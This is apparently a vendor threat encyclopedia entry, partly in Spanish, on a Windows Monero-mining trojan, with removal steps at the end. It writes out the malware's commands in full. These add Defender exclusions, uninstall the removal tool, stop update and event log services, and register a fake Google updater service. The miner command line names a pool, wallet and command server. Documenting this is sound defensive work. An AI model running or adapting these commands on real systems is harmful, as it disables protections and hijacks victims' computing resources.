Trojan.Win64.MALXMR.CJDR
Windows
Tipo de malware
Trojan
Destructivo?
No
Cifrado
In the Wild:
Sí
Resumen y descripción
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Se conecta a determinados sitios Web para enviar y recibir información.
Detalles técnicos
Detalles de entrada
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Instalación
Este malware infiltra una copia de sí mismo en las carpetas siguientes con diferentes nombres de archivo:
- %ProgramData%\Google\Chrome\updater.exe
Agrega los procesos siguientes:
- powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force → adds the user profile and program data directories to the exclusion list for Windows Defender to bypass scanning specific folders and .exe files.
- cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart → quietly uninstalls the Microsoft Malicious Software Removal Tool (KB890830) without restarting the computer.
- c.exe stop UsoSvc → stops the Update Orchestrator Service, which manages Windows Updates
- sc.exe stop WaaSMedicSvc → stops the Windows Update Medic Service, which ensures the proper functioning of Windows Update components
- sc.exe stop wuauserv → stops the Windows Update service to halt automatic updates
- sc.exe stop bits → stops the Background Intelligent Transfer Service, used by Windows Update for downloading updates
- sc.exe stop dosvc → stops the Delivery Optimization service, which handles peer-to-peer update sharing
- powercfg.exe /x -hibernate-timeout-ac 0 → disables the hibernate timeout for computers on AC power
- powercfg.exe /x -hibernate-timeout-dc 0 → disables the hibernate timeout for computers on battery power
- powercfg.exe /x -standby-timeout-ac 0 → disables the standby timeout for computers on AC power
- powercfg.exe /x -standby-timeout-dc 0 → disables the standby timeout for computers on battery power
- sc.exe delete "GoogleUpdateTaskMachineQC" → deletes existing service named "GoogleUpdateTaskMachineQC"
- sc.exe create "GoogleUpdateTaskMachineQC" binpath= "%ProgramData%\Google\Chrome\updater.exe" start= "auto" → creates a new service that points to the dropped copy of itself
- sc.exe stop eventlog → stops the Windows Event Log service
- sc.exe start "GoogleUpdateTaskMachineQC" → starts the newly created service.
- explorer.exe --algo=rx/0 --url=xmr.2miners.com:12222 --user=86EBNigoaCXSio7ySVmzWpQKwD6L2LAsFFhfZEFbqiivD4n2BdrXF4XKcXAFHLS7hsRcYW3WXpQZqgkWuFR66QeqMx3AV4S --pass=x --cpu-max-threads-hint=20 --cinit-winring=mhhvoejiojwd.sys --cinit-stealth-targets=Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,PLlhDBWxRt.exe,GPU-Z.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe --cinit-api=http://cdnupdateservice.com/api/endpoint.php --cinit-version=3.4.0 --tls --cinit-idle-wait=5 --cinit-idle-cpu=90 --cinit-id=tjnooobwkhcgvgyn → runs a hidden Monero mining process disguised as a legitimate process and using stealth parameters to avoid detection by various applications
Otras modificaciones del sistema
Agrega las siguientes entradas de registro:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\MRT
DontOfferThroughWUAU = 1 → disables offering Microsoft Removal Tool updates through Windows Update
Modifica las siguientes claves de registro:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
services\wuauserv
Renamed to wuauserv_bkp → results in Windows Update service to stop working
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
services\BITS
Renamed to BITS_bkp → results in Background Intelligent Transfer Service to stop working
Otros detalles
Agrega las siguientes entradas de registro como parte de la rutina de instalación:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\MRT
Se conecta al sitio Web siguiente para enviar y recibir información:
- http://{BLOCKED}.{BLOCKED}.{BLOCKED}.251
which redirects to:- http://{BLOCKED}ateservice.com/api/endpoint.php
- {BLOCKED}.{BLOCKED}.{BLOCKED}.184:1222
which redirects to:- {BLOCKED}ners.com:12222
which redirects again to:- {BLOCKED}ners.com:12222 → mining pool
- {BLOCKED}ners.com:12222
Hace lo siguiente:
- It utilizes binary padding to increase its own file size and evade detection.
- It uses up to 20 CPU threads for mining, potentially slowing down the system.
- It injects its mining process to explorer.exe and hides itself from detection from the following applications:
- GPU-Z.exe
- perfmon.exe
- ProcessHacker.exe
- procexp.exe
- procexp64.exe
- Taskmgr.exe
- arma3_x64.exe
- arma3.exe
- bf4.exe
- BlackOpsColdWar.exe
- Borderlands2.exe
- Borderlands3.exe
- CK2game.exe
- ck3.exe
- csgo.exe
- Cyberpunk2077.exe
- DeadByDaylight-Win64-Shipping.exe
- EliteDangerous64.exe
- enlisted.exe
- EscapeFromTarkov.exe
- FactoryGame.exe
- Falluot4.exe
- FarCry5.exe
- ffxiv_dx11.exe
- ffxiv.exe
- FIFA21.exe
- FiveM_b2189_GTAProcess.exe
- FiveM_GTAProcess.exe
- FiveM.exe
- FortniteClient-Win64-Shipping.exe
- ForzaHorizon4.exe
- GenshinImpact.exe
- GTA5.exe
- iw6sp64_ship.exe
- League of Legends.exe
- LeagueClientUx.exe
- left4dead2.exe
- Little_Nightmares_II_Enhanced-Win64-Shipping.exe
- ModernWarfare.exe
- NarakaBladepoint.exe
- NarakaBladepoint.exe
- NBA2K21.exe
- NBA2K22.exe
- NMS.exe
- Phasmophobia.exe
- PlanetCoaster.exe
- PointBlank.exe
- PortalWars-Win64-Shipping.exe
- r5apex.exe
- RainbowSix_BE.exe
- RainbowSix.exe
- RDR2.exe
- re8.exe
- RocketLeague.exe
- RogueCompany.exe
- RustClient.exe
- ShooterGame_BE.exe
- ShooterGame.exe
- ShooterGameServer.exe
- SoTGame.exe
- SRTTR.exe
- stellaris.exe
- TEKKEN7.exe
- Tiger-Win64-Shipping.exe
- TslGame.exe
- VALORANT.exe
- VRChat.exe
- Warframe.x64.exe
- WatchDogsLegion.exe
- WorldOfTanks.exe
- zula.exe
- acad.exe
- Adobe Premiere Pro.exe
- AfterFX.exe
- Photoshop.exe
- VideoEditorPlus.exe
- AndroidEmulatorEn.exe
- PLlhDBWxRt.exe
- It throttles down CPU usage to 90% if the system is idle.
- It uses the following version of XMR mining application:
- 3.4.0
- It mines the following cryptocurrency coin:
- Monero (XMR)
Soluciones
Step 1
Los usuarios de Windows ME y XP, antes de llevar a cabo cualquier exploración, deben comprobar que tienen desactivada la opción Restaurar sistema para permitir la exploración completa del equipo.
Step 2
Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.
Step 3
Reiniciar en modo seguro y eliminar esta clave del Registro
Importante: si modifica el Registro de Windows incorrectamente, podría hacer que el sistema funcione mal de manera irreversible. Lleve a cabo este paso solo si sabe cómo hacerlo o si puede contar con ayuda de su administrador del sistema. De lo contrario, lea este artículo de Microsoft antes de modificar el Registro del equipo.
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\
- GoogleUpdateTaskMachineQC
- GoogleUpdateTaskMachineQC
Step 4
Eliminar este valor del Registro
Importante: si modifica el Registro de Windows incorrectamente, podría hacer que el sistema funcione mal de manera irreversible. Lleve a cabo este paso solo si sabe cómo hacerlo o si puede contar con ayuda de su administrador del sistema. De lo contrario, lea este artículo de Microsoft antes de modificar el Registro del equipo.
- In HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT
- DontOfferThroughWUAU = 1
- DontOfferThroughWUAU = 1
Step 5
Eliminar esta clave del Registro
Importante: si modifica el Registro de Windows incorrectamente, podría hacer que el sistema funcione mal de manera irreversible. Lleve a cabo este paso solo si sabe cómo hacerlo o si puede contar con ayuda de su administrador del sistema. De lo contrario, lea este artículo de Microsoft antes de modificar el Registro del equipo.
- In HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\
- MRT
- MRT
Step 6
Buscar y eliminar este archivo
- %ProgramData%\Google\Chrome\updater.exe
Step 7
Reinicie en modo normal y explore el equipo con su producto de Trend Micro para buscar los archivos identificados como Trojan.Win64.MALXMR.CJDR En caso de que el producto de Trend Micro ya haya limpiado, eliminado o puesto en cuarentena los archivos detectados, no serán necesarios más pasos. Puede optar simplemente por eliminar los archivos en cuarentena. Consulte esta página de Base de conocimientos para obtener más información.
Rellene nuestra encuesta!